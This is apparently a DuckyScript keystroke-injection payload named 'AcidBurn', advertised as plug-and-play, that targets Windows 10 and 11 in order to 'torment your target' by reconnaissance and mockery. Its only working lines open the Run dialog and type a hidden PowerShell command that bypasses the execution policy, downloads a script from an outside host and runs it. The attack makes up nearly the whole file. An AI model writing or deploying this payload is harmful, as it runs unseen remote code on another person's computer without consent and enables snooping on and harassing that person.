REM     Title: AcidBurn

REM     Author: I am Jakoby

REM     Description: This payload is meant to torment your target to the fullest extent. Mission to recon then roast. See README.md for more details

REM     Target: Windows 10, 11

REM     --------------------------------------------------------------------------------------
REM     THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
REM     --------------------------------------------------------------------------------------

GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Ep Bypass iwr https://jakoby.lol/zyg | iex
ENTER
